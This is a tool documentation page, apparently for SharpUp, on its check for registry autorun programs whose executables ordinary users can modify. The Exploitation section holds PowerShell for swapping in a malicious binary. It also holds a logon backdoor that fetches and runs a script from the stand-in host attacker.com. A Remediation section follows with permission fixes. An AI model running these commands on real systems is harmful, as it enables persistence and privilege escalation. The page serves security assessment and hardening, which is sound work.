Skip to main content

Overview

The Registry Autoruns check identifies registry entries that automatically execute programs at system startup or user logon, where the executable files have weak permissions. This allows an attacker to replace legitimate autorun binaries with malicious ones for privilege escalation or persistence.

How It Works

SharpUp checks multiple autorun registry locations: HKLM Locations:
  • SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  • SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
  • SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
  • SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce
  • SOFTWARE\Microsoft\Windows\CurrentVersion\RunService
  • SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceService
  • SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunService
  • SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnceService
For each entry:
  1. Extracts the executable path using regex
  2. Checks if the current user can modify the executable
  3. Reports modifiable autorun binaries

Example Output

=== Modifiable Registry AutoRun Files ===
    HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run : C:\Tools\startup.exe
    HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run : C:\Apps\monitor.bat

Exploitation

Method 1: Replace Autorun Binary

# Backup original
$autorunPath = "C:\Tools\startup.exe"
Copy-Item $autorunPath "$autorunPath.bak"

# Replace with malicious binary
Copy-Item C:\temp\malicious.exe $autorunPath -Force

# Wait for system restart or user logon
# Malicious code executes automatically

Method 2: Persistence

# Create backdoor that runs at every logon
$payload = @"
@echo off
powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')"
"@

$payload | Out-File -FilePath "C:\Tools\startup.bat" -Encoding ASCII

# Executes every time any user logs on

Remediation

1

Identify Modifiable Autoruns

$runKeys = @(
    "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run"
)

foreach ($key in $runKeys) {
    Get-ItemProperty $key | Get-Member -MemberType NoteProperty |
    Where-Object { $_.Name -notmatch "PS" } | ForEach-Object {
        $name = $_.Name
        $value = (Get-ItemProperty $key).$name

        if ($value -match '(.+\.exe|.+\.bat|.+\.ps1)') {
            $exePath = $matches[1].Trim('"')
            if (Test-Path $exePath) {
                $acl = Get-Acl $exePath
                Write-Host "Checking: $name -> $exePath"
            }
        }
    }
}
2

Secure Autorun Binaries

# Fix permissions on autorun executable
$exePath = "C:\Tools\startup.exe"

icacls $exePath /reset
icacls $exePath /inheritance:r
icacls $exePath /grant:r "SYSTEM:F"
icacls $exePath /grant:r "Administrators:F"
icacls $exePath /grant:r "Users:RX"
3

Remove Unnecessary Autoruns

# Review and remove unnecessary autorun entries
$key = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
Remove-ItemProperty -Path $key -Name "UnnecessaryApp"

Hijackable Paths

Writable folders in system PATH

Modifiable Scheduled Task

Scheduled tasks with weak permissions